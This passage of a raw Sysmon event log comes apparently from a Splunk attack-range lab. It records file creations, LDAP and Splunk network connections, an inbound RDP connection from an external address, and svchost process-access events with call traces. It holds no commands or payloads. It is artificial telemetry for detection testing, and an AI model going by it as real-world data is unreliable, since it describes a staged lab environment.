Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19FA6987838086DFC95DA0A8D683DEF7,SHA256=9DDF6311221B322123204A9DAC967BFF95DD41560FF0DDCC3A36D8296731C3E5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809887Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:13.340{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57430-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001053584Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:08.053{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61932-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001053583Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:08.053{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61932-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001053582Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:15.551{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AF21B81C1643FD9099DA5BE01B9245B2,SHA256=FB417C0A3CF2AD7DE7465A33253C23DD9D00A5FF70E1AB8851D3C4EC8F6F423C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053581Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:15.551{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5F17C06D07CD5521ACCE31B80716B838,SHA256=FA52F1B9172ACD20F360A08E7E549B3D88640A4D68BF80821ABE88500EF2B693,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053586Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:16.950{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F081AFFC4488B37FC04F09C3EBCC1C4C,SHA256=C70F4621CF4AF94570ADD22E3E1B51CBAA4A840D7F298CA6CBDC69B851429B18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809889Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:16.897{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADA662B3284B215A3C67914AF6133D1F,SHA256=4ABF5FCD48F0247495AAD38DA611892F6D34988BB5A06B9C30E4EF14EF4220B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053590Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:17.965{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A07F9A72BA784DD4E2F7CF1A626030B6,SHA256=D6404465684CAAAD14EDDA83557466DEFA4287C28921C63CFD41D62256C51384,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809890Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:17.897{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=542314C13A5BC1FE47CED4EC00DC2D94,SHA256=108622304704B027533DE5D2099F86A43129FEF5251EFBB3AC62432143600CAC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053589Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:09.744{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61933-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001053588Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:09.744{466BC892-02BC-60E8-2500-00000000CF01}2780C:\Windows\System32\spoolsv.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61933-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 23542300x80000000000000001053587Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:17.234{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AF21B81C1643FD9099DA5BE01B9245B2,SHA256=FB417C0A3CF2AD7DE7465A33253C23DD9D00A5FF70E1AB8851D3C4EC8F6F423C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809891Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:18.913{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D79EF558A845314D1F1360888867FBF,SHA256=F9E837ADA59A701C15B8541EA387F11E8BA6E6FFF9D19C6AB53DD1C964F8DFF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053593Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:18.980{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46E5B5809895E3130DC408BA321A4236,SHA256=6DC0D2940FB41BE9D21D832D58360A063C089C0D7699AD642BA0B4DF9C70BE3D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053592Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:10.611{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61934-false10.0.1.12-8000- 23542300x80000000000000001053591Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:18.481{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809892Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:19.913{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC4B2124784AEA9B207E4D589F3BE377,SHA256=8D4FA59204624FB70F7E318AFB4C9E1BDBD6CBE34B405A1502A4DF9D69046E7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053595Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:19.980{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8049DA129744DDE75B025BDAD66BECCF,SHA256=BC9D4AF17584CA97CF905D51E52286C23289E66BA1CC772599FFC98C906B508C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053594Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:19.480{466BC892-02AF-60E8-1400-00000000CF01}1028NT AUTHORITY\SYSTEMC:\Windows\System32\svchost.exeC:\Windows\System32\LogFiles\Sum\{8461F54B-E592-4AB6-AAD2-4E1179AB057C}.mdbMD5=B3C147A8493EFBEE43435AB7C7111252,SHA256=635A79198E788801CFCB2DC7AE3DE89B47A2AAFE4815F9896B799AF378786E68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809895Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:20.944{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=218B3C9AD3B6AFE890C3CB0A0D614C87,SHA256=1FE2762AC4D89050C16530D33DAAF4B3944702FAE279B216AD8DD0351B41E7A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809894Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:20.804{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809893Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:19.202{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57431-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809896Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:21.975{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D5A8704AF57E3A2B9D17CDF248C81B2,SHA256=683EF5E9389D5B1EA3A28E9EC556924A57617165545CD676F7BF469D47230199,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053675Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:14.092{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse89.248.165.74recyber.net32287-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001053674Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.829{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7C933F0445244A03F4AF7B68803BA6A,SHA256=DFB7F8009C24BB96EC4D74FEE2C6B4BE0B9B9803B03F8FBEFF428D54CA2CD209,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053673Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.695{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053672Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.695{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053671Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.695{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053670Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.695{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053669Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.695{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053668Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.695{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053667Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.695{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053666Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053665Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053664Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053663Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053662Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053661Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053660Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053659Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053658Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053657Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053656Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 